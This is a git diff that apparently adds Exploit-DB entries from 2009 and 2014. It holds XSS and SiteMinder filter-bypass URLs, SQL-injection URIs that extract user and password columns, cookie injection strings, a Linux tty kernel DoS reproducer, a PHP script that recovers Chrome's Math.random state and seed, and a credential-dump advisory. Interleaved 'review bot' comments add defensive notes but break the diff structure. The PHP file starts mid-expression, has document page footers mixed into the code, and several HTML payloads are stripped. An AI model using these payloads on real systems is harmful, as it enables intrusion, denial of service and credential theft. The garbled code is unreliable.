diff --git a/files.csv b/files.csv
index 447d1b926..d8376ce86 100755
--- a/files.csv
+++ b/files.csv
@@ -29912,3 +29912,17 @@ id,file,description,date,author,platform,type,port
 33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0
 33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0
 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0
+33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0
+33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0
+33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0
+33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0
+33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector 'lnresobject.dll' Unspecified Remote Denial of Service Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
+33186,platforms/php/webapps/33186.txt,"VideoGirls forum.php t Parameter XSS",2009-08-26,Moudi,php,webapps,0
+33187,platforms/php/webapps/33187.txt,"VideoGirls profile.php profile_name Parameter XSS",2009-08-26,Moudi,php,webapps,0
+33188,platforms/php/webapps/33188.txt,"VideoGirls view.php p Parameter XSS",2009-08-26,Moudi,php,webapps,0
+33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0
+33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds <= 1.5.9 SQL Injection Vulnerabilities",2009-08-25,"Andrew Horton",php,webapps,0
+33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 'CookieUsername' Cookie Parameter SQL Injection Vulnerability",2009-08-28,Inj3ct0r,php,webapps,0
+33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 'Math.Random()' Random Number Generation Vulnerability",2009-08-31,"Amit Klein",multiple,remote,0
+33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0
+33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0
diff --git a/platforms/java/webapps/33181.txt b/platforms/java/webapps/33181.txt
new file mode 100755
index 000000000..844fb1062
--- /dev/null
+++ b/platforms/java/webapps/33181.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36088/info
+
+Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to bypass cross-site scripting protections. Successful exploits can aid in further attacks.
+
+We don't know which versions of SiteMinder are affected. We will update this BID when more details become available.
+
+http://www.example.com/app/function?foo=bar%e0%80%bc
diff --git a/platforms/linux/dos/33193.c b/platforms/linux/dos/33193.c
new file mode 100755
index 000000000..f2f06580c
--- /dev/null
+++ b/platforms/linux/dos/33193.c
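Review bot: platforms/java/webapps/33181.txt shows the sample request but never says what `%e0%80%bc` is, which is the one fact a defender needs from this entry: it is a three-byte, non-shortest-form (overlong) UTF-8 encoding of `<` (U+003C). A line stating that, and that input should go through a strict UTF-8 decoder that rejects overlong forms before any cross-site-scripting filter is applied, would make the entry usable for writing a detection rule or a regression test. The text also leaves the affected versions open ("We don't know which versions"), so the entry should point to the vendor fix once one is known.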
@@ -0,0 +1,260 @@
+source: http://www.securityfocus.com/bid/36191/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
+
+This issue was introduced in Linux kernel 2.6.26 and fixed in 2.6.31-rc8.
+
+/* gcc -o KernelTtyTest KernelTtyTest.c -Wall -O2 -lutil */
+#define _GNU_SOURCE 1
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#define POLL_TIMEOUT (10*1000) /* in milliseconds */
+#define LASTBUFSZ 10000
+#define CMDBUFSZ 10000
+#define SIGINT_LONGJMP 0
+#define SIGINT_VAR 1
+static void putstr(char *str, FILE *out)
+{
+ int c;
+ for (c = *str++; c; c = *str++) {
+ if (iscntrl(c)) {
+ putc('\\', out);
+ switch(c) {
+ case '\n': putc('n', out); break;
+ case '\r': putc('r', out); break;
+ default: printf("%03o", c); break;
+ }
+ } else {
+ putc(c, out);
+ }
+ }
+}
+static void print_lastbytes(char *lastbytes, size_t totalbytes, FILE *out)
+{
+ char *start = lastbytes;
+ if (totalbytes < LASTBUFSZ)
+ start = &lastbytes[LASTBUFSZ - totalbytes];
+ fprintf(out, "lastbytes: '");
+ putstr(start, out);
+ fprintf(out, "'");
+}
+static void expect(int masterfd, char *str, size_t len)
+{
+ char lastbytes[LASTBUFSZ + 1];
+ size_t totalbytes = 0;
+ memset(lastbytes, sizeof(lastbytes), 0);
+
+ for (;;) {
+ char buf[1];
+ ssize_t bytes;
+ int ret;
+ struct pollfd fds = {
+ .fd = masterfd,
+ .events = POLLIN | POLLERR | POLLHUP,
+ .revents = 0,
+ };
+ ret = poll(&fds, 1, POLL_TIMEOUT);
+ if (ret == 0) {
+ fprintf(stderr, "Timeout while waiting for '");
+ putstr(str, stderr);
+ fprintf(stderr, "' ");
+ print_lastbytes(lastbytes, totalbytes, stderr);
+ fprintf(stderr,"\n");
+ exit(5);
+ }
+ else if (ret < 0) {
+ fprintf(stderr, "poll failed: %s\n", strerror(errno));
+ exit(4);
+ }
+ bytes = read(masterfd, buf, 1);
+ if (bytes == 1) {
+ totalbytes++;
+ memmove(lastbytes, lastbytes +1, LASTBUFSZ);
+ lastbytes[LASTBUFSZ - 1] = buf[0];
+ lastbytes[LASTBUFSZ] = '\0';
+ if (memcmp(&lastbytes[LASTBUFSZ - len], str, len) == 0)
+ return;
+ }
+ else if (bytes < 0) {
+ fprintf(stderr, "read failed: %s\n",
+ strerror(errno));
+ print_lastbytes(lastbytes, totalbytes, stderr);
+ fprintf(stderr,"\n");
+ abort();
+ exit(3);
+ }
+ }
+}
+static void resync(int masterfd)
+{
+ static unsigned count;
+ char cookie[100];
+ char cmd[1000];
+ char reply[1000];
+ ssize_t written, bytes;
+ snprintf(cookie, sizeof(cookie), "_%u_", ++count);
+ bytes = snprintf(cmd, sizeof(cmd), "echo %s\n", cookie);
+ written = 0;
+ while (bytes) {
+ ssize_t sent;
+ sent = write(masterfd, cmd + written, bytes);
+ if (sent >= 0) {
+ written += sent;
+ bytes -= sent;
+ } else if ((errno != EAGAIN) && (errno != EINTR)) {
+ fprintf(stderr, "Write to child failed: %s\n", strerror(errno));
+ exit(2);
+ }
+ }
+ snprintf(reply, sizeof(reply), "\n%s", cookie);
+ expect(masterfd, reply, strlen(reply));
+}
+#if SIGINT_VAR
+static volatile sig_atomic_t saw_sigint;
+#endif
+
+static void process_cmd(void)
+{
+ char cmdbuf[CMDBUFSZ];
+ size_t cmdlen;
+ char buf[1];
+ cmdlen = 0;
+ for (;;) {
+ ssize_t bytes;
+#if SIGINT_VAR
+ if (saw_sigint) {
+ saw_sigint = 0;
+ printf("^C\n");
+ fflush(stdout);
+ return;
+ }
+#endif
+ bytes = read(STDIN_FILENO, buf, 1);
+ if (bytes == 1) {
+ cmdbuf[cmdlen] = '\0';
+ putchar(buf[0]);
+ fflush(stdout);
+ if (buf[0] == '\n') {
+ if (cmdlen == 0) {
+ printf("> ");
+ fflush(stdout);
+ }
+ else if (memcmp("echo ", cmdbuf, 5) == 0) {
+ printf("%s\n", cmdbuf + 5);
+ fflush(stdout);
+ return;
+ } else {
+ fprintf(stdout, "unknown cmd: '");
+ putstr(cmdbuf, stdout);
+ printf("'\n");
+ fflush(stdout);
+ return;
+ }
+ }
+ cmdlen += 1;
+ if (cmdlen >= CMDBUFSZ) {
+ fprintf(stderr, "command too long!\n");
+ _exit(3);
+ }
+ cmdbuf[cmdlen - 1] = buf[0];
+ cmdbuf[cmdlen] = '\0';
+ }
+ if (bytes == 0) {
+ /* EOF terminate */
+ _exit(0);
+ }
+ if (bytes < 0) {
+ fprintf(stderr, "%s read failed: %s\n",
+ __func__, strerror(errno));
+ _exit(4);
+ }
+ }
+}
+#if SIGINT_LONGJMP
+static sigjmp_buf sigint_dest;
+#endif
+static void sigint_handler(int signum)
+{
+#if SIGINT_LONGJMP
+ siglongjmp(sigint_dest, 1);
+#endif
+#if SIGINT_VAR
+ saw_sigint = 1;
+#endif
+}
+static void process_cmds(void)
+{
+ sigset_t signal_set;
+#if 1
+ struct sigaction act;
+#endif
+ sigemptyset( &signal_set);
+ sigaddset( &signal_set, SIGINT);
+
+ /* Block sigint until I reinstall the handler */
+ sigprocmask(SIG_BLOCK, &signal_set, NULL);
+#if 0
+ signal(SIGINT, sigint_handler);
+#else
+ memset(&act, sizeof(act), 0);
+ act.sa_handler = &sigint_handler;
+ act.sa_flags = SA_NODEFER;
+ sigaction(SIGINT, &act, NULL);
+#endif
+#if SIGINT_LONGJMP
+ if (sigsetjmp(sigint_dest, 1)) {
+ printf("^C\n");
+ fflush(stdout);
+ }
+#endif
+ sigprocmask(SIG_UNBLOCK, &signal_set, NULL);
+ for (;;)
+ process_cmd();
+}
+int main(int argc, char *argv[], char *environ[])
+{
+ pid_t pid;
+ int masterfd;
+ struct winsize terminal_size;
+ int i;
+ terminal_size.ws_row = 80;
+ terminal_size.ws_col = 25;
+ terminal_size.ws_xpixel = 0;
+ terminal_size.ws_ypixel = 0;
+
+ pid = forkpty(&masterfd, NULL, NULL, &terminal_size);
+ if (pid == 0) { /* child */
+ char *args[] = { "/bin/sh", NULL };
+ char *env[] = { NULL };
+#if 0
+ execve("/bin/bash", args, env);
+#endif
+#if 1
+ process_cmds();
+#endif
+ _exit(1);
+ }
+ resync(masterfd);
+#if 1
+ for (i = 0; i < 10; i++) {
+ usleep(100);
+ kill(pid, SIGINT);
+ }
+#endif
+#if 0
+ usleep(1000);
+#endif
+ resync(masterfd);
+ return 0;
+}
diff --git a/platforms/multiple/remote/33192.php b/platforms/multiple/remote/33192.php
new file mode 100755
index 000000000..356a427ee
--- /dev/null
+++ b/platforms/multiple/remote/33192.php
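Review bot: In platforms/linux/dos/33193.c, `memset(lastbytes, sizeof(lastbytes), 0);` in expect() has the fill value and the length swapped, so it writes zero bytes and leaves the buffer uninitialised. On a timeout before any byte arrives, print_lastbytes() passes putstr() a pointer to `lastbytes[LASTBUFSZ]`, which has never been written, and the diagnostic reads stack memory until it happens to meet a NUL. The same transposition is in process_cmds(), `memset(&act, sizeof(act), 0);`, which leaves `act.sa_mask` indeterminate when sigaction() is called. The calls should read `memset(lastbytes, 0, sizeof(lastbytes));` and `memset(&act, 0, sizeof(act));`.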
@@ -0,0 +1,193 @@ +source: http://www.securityfocus.com/bid/36185/info + +Google Chrome is prone to security vulnerability that may allow the application to generate weak random numbers. + +Successfully exploiting this issue may allow attackers to obtain sensitive information or gain unauthorized access. + +Chrome 3.0 Beta is vulnerable; other versions may also be affected. + +> 16)|(($unk & 3)<<14); +$hi2low=($v2 >> 16)|(($unk>>2)<<14); +$hi1high=bcmod(bcsub(bcadd($two_32,$hi2low),bcmul(36969,$hi1low)),65536); +if ($hi1high>=36969) +{ +continue; +} +$hi1=bcadd(bcmul($hi1high,65536),$hi1low)+0; +$hi2=bcadd(bcmul(36969,($hi1 & 0xFFFF)),bcdiv($hi1,65536,0))+0; +$hi3=bcadd(bcmul(36969,($hi2 & 0xFFFF)),bcdiv($hi2,65536,0))+0; +$hi4=bcadd(bcmul(36969,($hi3 & 0xFFFF)),bcdiv($hi3,65536,0))+0; +if (($v1 == ((($hi1<<16)|($lo1 & 0xFFFF))&0x3FFFFFFF)) and +($v2 == ((($hi2<<16)|($lo2 & 0xFFFF))&0x3FFFFFFF)) and +Google Chrome v3.0 (Beta) Math.random vulnerability +10 +($v3 == ((($hi3<<16)|($lo3 & 0xFFFF))&0x3FFFFFFF)) and +($v4 == ((($hi4<<16)|($lo4 & 0xFFFF))&0x3FFFFFFF))) +{ +$found_state=true; +break; +} +} +if (!$found_state) +{ +echo "ERROR: cannot find PRNG state (is this really Chrome 3.0?) +
\n"; +exit; +} +echo "Math.random PRNG current state: hi=$hi4 lo=$lo4
\n"; +$lo5=bcadd(bcmul(18273,bcmod($lo4,65536)),bcdiv($lo4,65536,0)); +$hi5=bcadd(bcmul(36969,($hi4 & 0xFFFF)),bcdiv($hi4,65536,0))+0; +$v5=(($hi5<<16)|($lo5 & 0xFFFF))&0x3FFFFFFF; +echo "Math.random next value: +
\n"; +echo "
\n"; +echo "NOTE: Anything below this line is available only for Windows.
\n"; +echo "
\n"; +# Rollback +$lo=$lo1; +$hi=$hi1; +$found_initial_state=false; +for ($mileage=0;$mileage\n"; +echo "Math.random PRNG mileage: $mileage [Math.random() +invocations]
\n"; +$found_initial_state=true; +break; +} +} +if ($found_initial_state) +{ +echo "
"; +$first=$hi+0; +$second=$lo+0; +$cand=array(); +for ($v=0;$v<(1<<16);$v++) +{ +$state=($first<<16)|$v; +$state=adv($state); +if ((($state>>16)&0x7FFF)==$second) +{ +$state=prev_state(($first<<16)|$v); +$seed_time=bcadd(bcmul(bcdiv(bcmul($t,1000),$two_31,0),$two_31),$state); +if (bccomp($seed_time,bcmul($t,1000))==1) +{ +$seed_time=bcsub($seed_time,$two_31); +} +$cand[$seed_time]=$state; +} +} +Google Chrome v3.0 (Beta) Math.random vulnerability +11 +# reverse sort by seed_time key (string comparison - but since 2002, +second-since-Epoch are 10 digits exactly, so string comparison=numeric comparison) +krsort($cand); +echo count($cand)." candidate(s) for MSVCRT seed and seeding time, from +most likely to least likely:
\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo " \n"; +echo " "; +echo " \n"; +echo "\n"; +$cn=0; +foreach ($cand as $seed_time => $st) +{ +if ($cn==0) +{ +$pre=""; +$post=""; +} +else +{ +$pre=""; +$post=""; +} +echo "\n"; +echo " \n"; +echo " +\n"; +echo " \n"; +echo "\n"; +$cn++; +} +echo "
MSVCRT PRNG Seeding time [sec] MSVCRT PRNG Seeding time [UTC date] MSVCRT PRNG seed
".$pre.substr_replace($seed_time,".",- +3,0).$post."".$pre.gmdate("r",bcdiv($seed_time,1000)).$post."".$pre.$st.$post."
\n"; +echo "
\n"; +echo "
\n"; +} +else +{ +echo "ERROR: Cannot find Math.random initial state (non-Windows +platform?)
\n"; +} +} +?> + + +
+ + + + + + +
+ +
+ +
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33180.txt b/platforms/multiple/webapps/33180.txt
new file mode 100755
index 000000000..4dae9e912
--- /dev/null
+++ b/platforms/multiple/webapps/33180.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36087/info
+
+Adobe Flex SDK is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to express-install template files.
+
+An attacker could exploit this vulnerability to execute arbitrary script code in the context of a web application built using the SDK. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Flex SDK 3.4 are vulnerable.
+
+http://www.example.com/Flex/index.template.html?"/>
\ No newline at end of file
diff --git a/platforms/novell/dos/33183.html b/platforms/novell/dos/33183.html
new file mode 100755
index 000000000..bd950f02a
--- /dev/null
+++ b/platforms/novell/dos/33183.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36139/info
+
+The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error.
+
+A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
+
+Novell Client 4.91.5.1 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/novell/dos/33184.html b/platforms/novell/dos/33184.html
new file mode 100755
index 000000000..944e6d798
--- /dev/null
+++ b/platforms/novell/dos/33184.html
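Review bot: The affected-version statements for platforms/multiple/remote/33192.php disagree: the files.csv entry added in this commit is titled `Google Chrome <= 6.0.472`, the file's own header says `Chrome 3.0 Beta is vulnerable; other versions may also be affected`, and the script's error text asks `is this really Chrome 3.0?`. Anyone using the catalogue to judge exposure gets a different answer depending on which line they read, so the title and the header should state one range and where it comes from. The header should also say that the underlying weakness is a predictable `Math.random()` state, so readers know the application-side remedy is to take security-relevant values from a cryptographic random source rather than from `Math.random()`.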
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36139/info
+
+The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error.
+
+A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
+
+Novell Client 4.91.5.1 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/33186.txt b/platforms/php/webapps/33186.txt
new file mode 100755
index 000000000..075cbd240
--- /dev/null
+++ b/platforms/php/webapps/33186.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36168/info
+
+VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+http://www.example.com/forum.php?ftid=2&t=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33187.txt b/platforms/php/webapps/33187.txt
new file mode 100755
index 000000000..f4a65d058
--- /dev/null
+++ b/platforms/php/webapps/33187.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36168/info
+
+VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+http://www.example.com/profile.php?profile_name=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33188.txt b/platforms/php/webapps/33188.txt
new file mode 100755
index 000000000..700b47aa5
--- /dev/null
+++ b/platforms/php/webapps/33188.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36168/info
+
+VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+http://www.example.com/view.php?p=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33189.txt b/platforms/php/webapps/33189.txt
new file mode 100755
index 000000000..fa3c24a49
--- /dev/null
+++ b/platforms/php/webapps/33189.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/36171/info
+
+PHP-Fusion is prone to multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.
+
+The following example URIs are available:
+
+http://www.example.com/members.php?sortby[]=A
+http://www.example.com/messages.php?folder[]=inbox
\ No newline at end of file
diff --git a/platforms/php/webapps/33190.txt b/platforms/php/webapps/33190.txt
new file mode 100755
index 000000000..512ec5a84
--- /dev/null
+++ b/platforms/php/webapps/33190.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/36173/info
+
+OpenAutoClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to OpenAutoClassifieds 1.6.0 are vulnerable.
+
+The following proof-of-concept URIs are available:
+
+http://www.example.com/openauto/xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users
+
+http://www.example.com/openauto/listings.php?min-price=&max_price=&start_zip=BENCHMARK(1000000,MD5(1))&zip_range=10000&state=Illinois&submit=Search&vehicle_type=&make=&model=&year=&listing_condition=&trans=&drive_train=&sellerid=
\ No newline at end of file
diff --git a/platforms/php/webapps/33191.txt b/platforms/php/webapps/33191.txt
new file mode 100755
index 000000000..9831dfd1c
--- /dev/null
+++ b/platforms/php/webapps/33191.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36179/info
+
+FlexCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+FlexCMS 2.5 and prior versions are vulnerable.
+
+FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI
+FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI
+
diff --git a/platforms/php/webapps/33195.txt b/platforms/php/webapps/33195.txt
new file mode 100755
index 000000000..0adcb8d34
--- /dev/null
+++ b/platforms/php/webapps/33195.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Team Helpdesk Customer Web Service (CWS) Remote User Credential Dump exploit
+# Exploit Title: Team Helpdesk Technician Web Access (TWA) Remote User Credential Dump exploit
+# Date: May 5, 2014
+# Exploit Author: bhamb (ccb3b72@gmail.com)
+# Vendor Homepage: http://www.assistmyteam.net/TeamHelpdesk/
+# Software Link: http://www.assistmyteam.net/TeamHelpdesk/Download.asp
+# Version: 8.3.5 (and probably prior)
+# Tested on: Windows 2008 R2
+# CVE : -
+
+Recommendation:
+
+Usage: ./user_cred_dump_cws.py https://Hostname.com
+
+You will get a username:encrypted-password pairs.
+To decrypt the encrypted passwords, please use my Password Decrypt script
+(decrypt_cws.py) for Team Helpdesk CWS.
+
+
+
+
+Usage: ./user_cred_dump_twa.py https://Hostname.com
+
+You will get a username:encrypted-password pairs.
+To decrypt the encrypted passwords, please use my Password Decrypt script
+(decrypt_twa.py) for Team Helpdesk TWA.
+
+
+
+Verifying exploits
+https://www.youtube.com/watch?v=pJ1fGN3DIMU&feature=youtu.be
+
+
+
+Exploit-DB Mirror: http://www.exploit-db.com/sploits/33195-Team_Helpdesk_Web.zip
\ No newline at end of file
diff --git a/platforms/windows/dos/33185.html b/platforms/windows/dos/33185.html
new file mode 100755
index 000000000..35ac72797
--- /dev/null
+++ b/platforms/windows/dos/33185.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36144/info
+
+The Nokia Lotus Notes Connector 'lnresobject.dll' ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error.
+
+A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
+
+
\ No newline at end of file
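Review bot: In platforms/php/webapps/33195.txt the `Recommendation:` heading is followed only by usage lines for the two dump scripts, so the entry as shown carries no remediation, fixed version or vendor reference. The text says the tooling returns `username:encrypted-password` pairs that a companion script decrypts, which implies the product stores passwords reversibly. The entry should state that outright, because for an affected site it means every account password has to be treated as exposed and rotated, not only the service patched. `# CVE : -` should be replaced with an identifier if one has been assigned.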